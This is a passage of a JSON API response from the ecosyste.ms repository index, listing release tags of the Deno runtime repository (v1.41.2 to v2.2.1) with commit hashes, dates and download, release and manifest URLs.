syste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.e